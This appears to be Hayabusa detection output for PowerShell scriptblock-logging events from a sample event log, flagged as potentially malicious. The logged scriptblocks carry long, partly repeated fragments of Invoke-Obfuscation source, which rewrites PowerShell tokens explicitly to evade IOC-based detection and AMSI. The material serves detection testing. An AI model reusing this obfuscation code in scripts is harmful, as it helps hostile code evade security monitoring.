-ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. 
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString.
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. 
If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. 
While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. 
Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. 
Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. 
If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. 
While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. 
